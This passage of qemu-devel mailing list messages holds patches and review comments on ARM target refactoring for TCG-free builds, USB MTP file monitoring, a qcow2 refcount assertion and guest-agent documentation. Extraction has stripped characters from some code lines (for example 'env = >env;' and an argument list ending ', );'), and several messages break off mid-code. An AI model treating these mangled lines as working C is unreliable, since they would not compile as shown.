+case 3: /* linked context ID match */
+if (arm_current_el(env) > 1) {
+/* Context matches never fire in EL2 or (AArch64) EL3 */
+return false;
+}
+return (contextidr == extract64(env->cp15.dbgbvr[lbn], 0, 32));
+case 5: /* linked address mismatch (reserved in AArch64) */
+case 9: /* linked VMID match (reserved if no EL2) */
+case 11: /* linked context ID and VMID match (reserved if no EL2) */
+default:
+/* Links to Unlinked context breakpoints must generate no
+ * events; we choose to do the same for reserved values too.
+ */
+return false;
+}
+
+return false;
+}
+
+bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp)
+{
+CPUARMState *env = >env;
+uint64_t cr;
+int pac, hmc, ssc, wt, lbn;
+/* Note that for watchpoints the check is against the CPU security
+ * state, not the S/NS attribute on the offending data access.
+ */
+bool is_secure = arm_is_secure(env);
+int access_el = arm_current_el(env);
+
+if (is_wp) {
+CPUWatchpoint *wp = env->cpu_watchpoint[n];
+
+if (!wp || !(wp->flags & BP_WATCHPOINT_HIT)) {
+return false;
+}
+cr = env->cp15.dbgwcr[n];
+if (wp->hitattrs.user) {
+/* The LDRT/STRT/LDT/STT "unprivileged access" instructions should
+ * match watchpoints as if they were accesses done at EL0, even if
+ * the CPU is at EL1 or higher.
+ */
+access_el = 0;
+}
+} else {
+uint64_t pc = is_a64(env) ? env->pc : env->regs[15];
+
+if (!env->cpu_breakpoint[n] || env->cpu_breakpoint[n]->pc != pc) {
+return false;
+}
+cr = env->cp15.dbgbcr[n];
+}
+/* The WATCHPOINT_HIT flag guarantees us that the watchpoint is
+ * enabled and that the address and access type match; for breakpoints
+ * we know the address matched; check the remaining fields, including
+ * linked breakpoints. We rely on WCR and BCR having the same layout
+ * for the LBN, SSC, HMC, PAC/PMC and is-linked fields.
+ * Note that some combinations of {PAC, HMC, SSC} are reserved and
+ * must act either like some valid combination or as if the 

[Qemu-devel] [PATCH 13/13] target: arm: Do not build TCG objects when TCG is off

[Samuel Ortiz]

We can now safely turn all TCG dependent build off when CONFIG_TCG is
off. This allows building ARM binaries with --disable-tcg.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/Makefile.objs | 14 --
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/target/arm/Makefile.objs b/target/arm/Makefile.objs
index 8e513748e3..3f59bf1685 100644
--- a/target/arm/Makefile.objs
+++ b/target/arm/Makefile.objs
@@ -1,9 +1,10 @@
 obj-y += arm-semi.o crypto_helper.o gdbstub.o helper.o cpu.o
-obj-y += translate.o op_helper.o neon_helper.o
-obj-y += iwmmxt_helper.o vec_helper.o m_helper.o
-obj-y += excp_helper.o vfp_helper.o
+obj-$(CONFIG_TCG) += translate.o op_helper.o neon_helper.o
+obj-$(CONFIG_TCG) += iwmmxt_helper.o vec_helper.o m_helper.o
+obj-$(CONFIG_TCG) += excp_helper.o vfp_helper.o
 
-obj-$(CONFIG_SOFTMMU) += machine.o psci.o arch_dump.o monitor.o arm-powerctl.o
+obj-$(CONFIG_SOFTMMU) += machine.o arch_dump.o monitor.o arm-powerctl.o
+obj-$(call land,$(CONFIG_TCG),$(CONFIG_SOFTMMU)) += psci.o
 obj-$(CONFIG_KVM) += kvm.o
 obj-$(call land,$(CONFIG_KVM),$(call lnot,$(TARGET_AARCH64))) += kvm32.o
 obj-$(call land,$(CONFIG_KVM),$(TARGET_AARCH64)) += kvm64.o
@@ -17,5 +18,6 @@ target/arm/decode-sve.inc.c: 
$(SRC_PATH)/target/arm/sve.decode $(DECODETREE)
  "GEN", $(TARGET_DIR)$@)
 
 target/arm/translate-sve.o: target/arm/decode-sve.inc.c
-obj-$(TARGET_AARCH64) += translate-sve.o sve_helper.o
-obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o gdbstub64.o
+obj-$(call land,$(CONFIG_TCG),$(TARGET_AARCH64)) += translate-sve.o 
sve_helper.o
+obj-$(call land,$(CONFIG_TCG),$(TARGET_AARCH64)) += translate-a64.o 
helper-a64.o
+obj-$(TARGET_AARCH64) += cpu64.o gdbstub64.o
-- 
2.19.1

Re: [Qemu-devel] [PATCH for-3.1 v2 1/1] qga: update docs with systemd suspend support info

[Eric Blake]

On 11/13/18 10:55 AM, Daniel Henrique Barboza wrote:

Commit 067927d62e ("qga: systemd hibernate/suspend/hybrid-sleep
support") failed to update qapi-schema.json after adding systemd
hibernate/suspend/hybrid-sleep capabilities to guest-suspend-* QGA
commands.

Signed-off-by: Daniel Henrique Barboza 
---
  qga/qapi-schema.json | 25 ++---
  1 file changed, 14 insertions(+), 11 deletions(-)



Reviewed-by: Eric Blake 

As a doc fix, I'm recommending the maintainer include it in 3.1.

--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org

[Qemu-devel] [PATCH 09/13] target: arm: Move CPU state dumping routines to helper.c

[Samuel Ortiz]

They're not TCG specific and should be living the generic helper file
instead.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Robert Bradford 
---
 target/arm/internals.h |  12 +++
 target/arm/translate.h |   7 --
 target/arm/helper.c| 214 +
 target/arm/translate-a64.c | 125 --
 target/arm/translate.c |  87 ---
 5 files changed, 226 insertions(+), 219 deletions(-)

diff --git a/target/arm/internals.h b/target/arm/internals.h
index 06439467d2..ddb594d58d 100644
--- a/target/arm/internals.h
+++ b/target/arm/internals.h
@@ -937,4 +937,16 @@ bool pmsav8_mpu_lookup(CPUARMState *env, uint32_t address,
int *prot, bool *is_subpage,
ARMMMUFaultInfo *fi, uint32_t *mregion);
 
+#ifdef TARGET_AARCH64
+void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
+fprintf_function cpu_fprintf, int flags);
+
+#else
+static inline void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
+  fprintf_function cpu_fprintf,
+  int flags)
+{
+}
+#endif
+
 #endif
diff --git a/target/arm/translate.h b/target/arm/translate.h
index 1550aa8bc7..059645c23c 100644
--- a/target/arm/translate.h
+++ b/target/arm/translate.h
@@ -155,8 +155,6 @@ static inline void disas_set_insn_syndrome(DisasContext *s, 
uint32_t syn)
 #ifdef TARGET_AARCH64
 void a64_translate_init(void);
 void gen_a64_set_pc_im(uint64_t val);
-void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
-fprintf_function cpu_fprintf, int flags);
 extern const TranslatorOps aarch64_translator_ops;
 #else
 static inline void a64_translate_init(void)
@@ -167,11 +165,6 @@ static inline void gen_a64_set_pc_im(uint64_t val)
 {
 }
 
-static inline void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
-  fprintf_function cpu_fprintf,
-  int flags)
-{
-}
 #endif
 
 void arm_test_cc(DisasCompare *cmp, int cc);
diff --git a/target/arm/helper.c b/target/arm/helper.c
index 996dfbbda2..ff3011fcb6 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -9555,4 +9555,218 @@ void aarch64_sve_change_el(CPUARMState *env, int old_el,
 aarch64_sve_narrow_vq(env, new_len + 1);
 }
 }
+
+void aarch64_cpu_dump_state(CPUState *cs, FILE *f,
+fprintf_function cpu_fprintf, int flags)
+{
+ARMCPU *cpu = ARM_CPU(cs);
+CPUARMState *env = >env;
+uint32_t psr = pstate_read(env);
+int i;
+int el = arm_current_el(env);
+const char *ns_status;
+
+cpu_fprintf(f, " PC=%016" PRIx64 " ", env->pc);
+for (i = 0; i < 32; i++) {
+if (i == 31) {
+cpu_fprintf(f, " SP=%016" PRIx64 "\n", env->xregs[i]);
+} else {
+cpu_fprintf(f, "X%02d=%016" PRIx64 "%s", i, env->xregs[i],
+(i + 2) % 3 ? " " : "\n");
+}
+}
+
+if (arm_feature(env, ARM_FEATURE_EL3) && el != 3) {
+ns_status = env->cp15.scr_el3 & SCR_NS ? "NS " : "S ";
+} else {
+ns_status = "";
+}
+cpu_fprintf(f, "PSTATE=%08x %c%c%c%c %sEL%d%c",
+psr,
+psr & PSTATE_N ? 'N' : '-',
+psr & PSTATE_Z ? 'Z' : '-',
+psr & PSTATE_C ? 'C' : '-',
+psr & PSTATE_V ? 'V' : '-',
+ns_status,
+el,
+psr & PSTATE_SP ? 'h' : 't');
+
+if (!(flags & CPU_DUMP_FPU)) {
+cpu_fprintf(f, "\n");
+return;
+}
+if (fp_exception_el(env, el) != 0) {
+cpu_fprintf(f, "FPU disabled\n");
+return;
+}
+cpu_fprintf(f, " FPCR=%08x FPSR=%08x\n",
+vfp_get_fpcr(env), vfp_get_fpsr(env));
+
+if (cpu_isar_feature(aa64_sve, cpu) && sve_exception_el(env, el) == 0) {
+int j, zcr_len = sve_zcr_len_for_el(env, el);
+
+for (i = 0; i <= FFR_PRED_NUM; i++) {
+bool eol;
+if (i == FFR_PRED_NUM) {
+cpu_fprintf(f, "FFR=");
+/* It's last, so end the line.  */
+eol = true;
+} else {
+cpu_fprintf(f, "P%02d=", i);
+switch (zcr_len) {
+case 0:
+eol = i % 8 == 7;
+break;
+case 1:
+eol = i % 6 == 5;
+break;
+case 2:
+case 3:
+eol = i % 3 == 2;
+break;
+default:
+/* More than one quadword per predicate.  */
+eol = true;
+break;
+}
+}
+for (j = zcr_len / 4; j >= 0; j--) {
+int digits;
+if (j * 4 + 4 <= zcr_len + 1) {
+digits = 16;
+} else {
+ 

Re: [Qemu-devel] [PATCH v6 05/11] hw/usb: switch MTP to use new inotify APIs

[Daniel P . Berrangé]

On Wed, Nov 07, 2018 at 10:26:29PM +0400, Marc-André Lureau wrote:
> On Fri, Oct 19, 2018 at 5:42 PM Daniel P. Berrangé  
> wrote:
> >
> > The internal inotify APIs allow alot of conditional statements to be
> 
> a lot
> 
> > cleared out, and provide a simpler callback for handling events.
> >
> > Signed-off-by: Daniel P. Berrangé 
> > ---
> >  hw/usb/dev-mtp.c| 250 
> >  hw/usb/trace-events |   2 +-
> >  2 files changed, 93 insertions(+), 159 deletions(-)
> >
> > diff --git a/hw/usb/dev-mtp.c b/hw/usb/dev-mtp.c
> > index ccbe25820b..1a8d0f088d 100644
> > --- a/hw/usb/dev-mtp.c
> > +++ b/hw/usb/dev-mtp.c
> > @@ -15,13 +15,11 @@
> >  #include 
> >
> >  #include 
> > -#ifdef CONFIG_INOTIFY1
> > -#include 
> > -#include "qemu/main-loop.h"
> > -#endif
> > +
> >
> >  #include "qemu-common.h"
> >  #include "qemu/iov.h"
> > +#include "qemu/filemonitor.h"
> >  #include "trace.h"
> >  #include "hw/usb.h"
> >  #include "desc.h"
> > @@ -124,7 +122,6 @@ enum {
> >  EP_EVENT,
> >  };
> >
> > -#ifdef CONFIG_INOTIFY1
> >  typedef struct MTPMonEntry MTPMonEntry;
> >
> >  struct MTPMonEntry {
> > @@ -133,7 +130,6 @@ struct MTPMonEntry {
> >
> >  QTAILQ_ENTRY(MTPMonEntry) next;
> >  };
> > -#endif
> >
> >  struct MTPControl {
> >  uint16_t code;
> > @@ -162,10 +158,8 @@ struct MTPObject {
> >  char *name;
> >  char *path;
> >  struct stat  stat;
> > -#ifdef CONFIG_INOTIFY1
> > -/* inotify watch cookie */
> > +/* file monitor watch cookie */
> >  int  watchfd;
> 
> Why not rename it watchid to avoid confusion?

Yes, will do.

> > -static void inotify_watchfn(void *arg)
> > +static void file_monitor_event(int wd,
> > +   QFileMonitorEvent ev,
> > +   const char *name,
> > +   void *opaque)
> >  {
> > -MTPState *s = arg;
> > -ssize_t bytes;
> > -/* From the man page: atleast one event can be read */
> > -int pos;
> > -char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
> > -
> > -for (;;) {
> > -bytes = read(s->inotifyfd, buf, sizeof(buf));
> > -pos = 0;
> > -
> > -if (bytes <= 0) {
> > -/* Better luck next time */
> > +MTPState *s = opaque;
> > +int watchfd = 0;
> > +MTPObject *parent = usb_mtp_object_lookup_wd(s, wd);
> > +MTPMonEntry *entry = NULL;
> > +MTPObject *o;
> > +
> > +if (!parent) {
> > +return;
> > +}
> > +
> > +switch (ev) {
> > +case QFILE_MONITOR_EVENT_CREATED:
> > +if (usb_mtp_object_lookup_name(parent, name, -1)) {
> > +/* Duplicate create event */
> >  return;
> >  }
> > +entry = g_new0(MTPMonEntry, 1);
> > +entry->handle = s->next_handle;
> > +entry->event = EVT_OBJ_ADDED;
> > +o = usb_mtp_add_child(s, parent, name);
> > +if (!o) {
> > +g_free(entry);
> > +return;
> > +}
> > +o->watchfd = watchfd;
> 
> this effectively always set o->watchfd to 0, which is already
> initialized to 0 with g_new0(), you can drop it

Yeah, pre-existing pointless code, so I've dropped it.


> >  static void usb_mtp_object_readdir(MTPState *s, MTPObject *o)
> >  {
> >  struct dirent *entry;
> >  DIR *dir;
> > +Error *err = NULL;
> >
> >  if (o->have_children) {
> >  return;
> > @@ -662,16 +596,19 @@ static void usb_mtp_object_readdir(MTPState *s, 
> > MTPObject *o)
> >  if (!dir) {
> >  return;
> >  }
> > -#ifdef CONFIG_INOTIFY1
> > -int watchfd = usb_mtp_add_watch(s->inotifyfd, o->path);
> > +
> > +int watchfd = qemu_file_monitor_add_watch(s->file_monitor, o->path, 
> > NULL,
> > +  file_monitor_event, s, );
> 
> There is an add_watch(), but I don't see the corresponding
> remove_watch(). This may probably cause crashes if MTPState is freed.

Yes, I've added code to remove the watch, and also
to use a private file_monitor instance so free'ing
that will release all watches as a safety net.

> 
> >  if (watchfd == -1) {
> > -fprintf(stderr, "usb-mtp: failed to add watch for %s\n", o->path);
> > +fprintf(stderr, "usb-mtp: failed to add watch for %s: %s\n", 
> > o->path,
> > +error_get_pretty(err));
> 
> maybe it's a good time to turn into error_report() ?

Yep


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|

Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

[Peter Maydell]

On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> From: Philippe Mathieu-Daudé 
>
> Signed-off-by: Philippe Mathieu-Daudé 
> Reviewed-by: Robert Bradford 
> Reviewed-by: Samuel Ortiz 
> ---
>  target/arm/helper.c | 3 ---
>  1 file changed, 3 deletions(-)
>
> diff --git a/target/arm/helper.c b/target/arm/helper.c
> index 3d4e9c5c8a..27d9285e1e 100644
> --- a/target/arm/helper.c
> +++ b/target/arm/helper.c
> @@ -12,13 +12,10 @@
>  #include "internals.h"
>  #include "exec/gdbstub.h"
>  #include "exec/helper-proto.h"
> -#include "qemu/host-utils.h"

This is for muldiv64().

>  #include "sysemu/arch_init.h"
>  #include "sysemu/sysemu.h"
> -#include "qemu/bitops.h"

This is for extract32() and friends.

>  #include "qemu/crc32c.h"
>  #include "exec/exec-all.h"
> -#include "exec/cpu_ldst.h"

This is for cpu_stl_data().

>  #include "arm_ldst.h"
>  #include  /* For crc32 */
>  #include "exec/semihost.h"

thanks
-- PMM

Re: [Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

[Philippe Mathieu-Daudé]

On 13/11/18 17:58, Peter Maydell wrote:

On 13 November 2018 at 16:52, Samuel Ortiz  wrote:

From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
  target/arm/helper.c | 7 +++
  1 file changed, 7 insertions(+)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 0da1424f72..3d4e9c5c8a 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -1,3 +1,10 @@
+/*
+ * ARM generic helpers.
+ *
+ * This code is licensed under the GNU GPL v2.
+ *
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */


The human readable text says "v2", but the SPDX tag says
"v2 or later". Which is right? (The top level LICENSE file says
source files with no specific license are 2-or-later).


Sorry, the human failed, the machine is right.

[Qemu-devel] [PATCH 04/13] target: arm: Move all interrupt and exception handlers into their own file

[Samuel Ortiz]

Most of them are TCG dependent so we want to be able to not build them
in order to support TCG disablement with ARM.

Signed-off-by: Samuel Ortiz 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/excp_helper.c | 550 +++
 target/arm/helper.c  | 531 -
 target/arm/Makefile.objs |   2 +-
 3 files changed, 551 insertions(+), 532 deletions(-)
 create mode 100644 target/arm/excp_helper.c

diff --git a/target/arm/excp_helper.c b/target/arm/excp_helper.c
new file mode 100644
index 00..38fe9703de
--- /dev/null
+++ b/target/arm/excp_helper.c
@@ -0,0 +1,550 @@
+/*
+ * Exception and interrupt helpers.
+ *
+ * This code is licensed under the GNU GPL v2 and later.
+ *
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+#include "qemu/osdep.h"
+#include "trace.h"
+#include "cpu.h"
+#include "internals.h"
+#include "sysemu/sysemu.h"
+#include "exec/exec-all.h"
+#include "exec/cpu_ldst.h"
+#include "arm_ldst.h"
+#include "exec/semihost.h"
+#include "sysemu/kvm.h"
+
+static void take_aarch32_exception(CPUARMState *env, int new_mode,
+   uint32_t mask, uint32_t offset,
+   uint32_t newpc)
+{
+/* Change the CPU state so as to actually take the exception. */
+switch_mode(env, new_mode);
+/*
+ * For exceptions taken to AArch32 we must clear the SS bit in both
+ * PSTATE and in the old-state value we save to SPSR_, so zero it 
now.
+ */
+env->uncached_cpsr &= ~PSTATE_SS;
+env->spsr = cpsr_read(env);
+/* Clear IT bits.  */
+env->condexec_bits = 0;
+/* Switch to the new mode, and to the correct instruction set.  */
+env->uncached_cpsr = (env->uncached_cpsr & ~CPSR_M) | new_mode;
+/* Set new mode endianness */
+env->uncached_cpsr &= ~CPSR_E;
+if (env->cp15.sctlr_el[arm_current_el(env)] & SCTLR_EE) {
+env->uncached_cpsr |= CPSR_E;
+}
+/* J and IL must always be cleared for exception entry */
+env->uncached_cpsr &= ~(CPSR_IL | CPSR_J);
+env->daif |= mask;
+
+if (new_mode == ARM_CPU_MODE_HYP) {
+env->thumb = (env->cp15.sctlr_el[2] & SCTLR_TE) != 0;
+env->elr_el[2] = env->regs[15];
+} else {
+/*
+ * this is a lie, as there was no c1_sys on V4T/V5, but who cares
+ * and we should just guard the thumb mode on V4
+ */
+if (arm_feature(env, ARM_FEATURE_V4T)) {
+env->thumb =
+(A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_TE) != 0;
+}
+env->regs[14] = env->regs[15] + offset;
+}
+env->regs[15] = newpc;
+}
+
+static void arm_cpu_do_interrupt_aarch32_hyp(CPUState *cs)
+{
+/*
+ * Handle exception entry to Hyp mode; this is sufficiently
+ * different to entry to other AArch32 modes that we handle it
+ * separately here.
+ *
+ * The vector table entry used is always the 0x14 Hyp mode entry point,
+ * unless this is an UNDEF/HVC/abort taken from Hyp to Hyp.
+ * The offset applied to the preferred return address is always zero
+ * (see DDI0487C.a section G1.12.3).
+ * PSTATE A/I/F masks are set based only on the SCR.EA/IRQ/FIQ values.
+ */
+uint32_t addr, mask;
+ARMCPU *cpu = ARM_CPU(cs);
+CPUARMState *env = >env;
+
+switch (cs->exception_index) {
+case EXCP_UDEF:
+addr = 0x04;
+break;
+case EXCP_SWI:
+addr = 0x14;
+break;
+case EXCP_BKPT:
+/* Fall through to prefetch abort.  */
+case EXCP_PREFETCH_ABORT:
+env->cp15.ifar_s = env->exception.vaddress;
+qemu_log_mask(CPU_LOG_INT, "...with HIFAR 0x%x\n",
+  (uint32_t)env->exception.vaddress);
+addr = 0x0c;
+break;
+case EXCP_DATA_ABORT:
+env->cp15.dfar_s = env->exception.vaddress;
+qemu_log_mask(CPU_LOG_INT, "...with HDFAR 0x%x\n",
+  (uint32_t)env->exception.vaddress);
+addr = 0x10;
+break;
+case EXCP_IRQ:
+addr = 0x18;
+break;
+case EXCP_FIQ:
+addr = 0x1c;
+break;
+case EXCP_HVC:
+addr = 0x08;
+break;
+case EXCP_HYP_TRAP:
+addr = 0x14;
+default:
+cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index);
+}
+
+if (cs->exception_index != EXCP_IRQ && cs->exception_index != EXCP_FIQ) {
+if (!arm_feature(env, ARM_FEATURE_V8)) {
+/*
+ * QEMU syndrome values are v8-style. v7 has the IL bit
+ * UNK/SBZP for "field not valid" cases, where v8 uses RES1.
+ * If this is a v7 CPU, squash the IL bit in those cases.
+ */
+if (cs->exception_index == EXCP_PREFETCH_ABORT ||
+(cs->exception_index == EXCP_DATA_ABORT &&
+ !(env->exception.syndrome & ARM_EL_ISV)) ||
+syn_get_ec(env->exception.syndrome) == 

[Qemu-devel] [PATCH] qcow2: Assert that refcount block offsets fit in the refcount table

[Alberto Garcia]

Refcount table entries have a field to store the offset of the
refcount block. The rest of the bits of the entry are currently
reserved.

The offset is always taken from the entry using REFT_OFFSET_MASK to
ensure that we only use the bits that belong to that field.

While that mask is used every time we read from the refcount table, it
is never used when we write to it. Due to the other constraints of the
qcow2 format QEMU can never produce refcount block offsets that don't
fit in that field so any such offset when allocating a refcount block
would indicate a bug in QEMU.
---
 block/qcow2-refcount.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/block/qcow2-refcount.c b/block/qcow2-refcount.c
index 46082aeac1..31a2e1f845 100644
--- a/block/qcow2-refcount.c
+++ b/block/qcow2-refcount.c
@@ -367,6 +367,9 @@ static int alloc_refcount_block(BlockDriverState *bs,
 return new_block;
 }
 
+/* The offset must fit in the offset field of the refcount table entry */
+assert((new_block & REFT_OFFSET_MASK) == new_block);
+
 /* If we're allocating the block at offset 0 then something is wrong */
 if (new_block == 0) {
 qcow2_signal_corruption(bs, true, -1, -1, "Preventing invalid "
-- 
2.11.0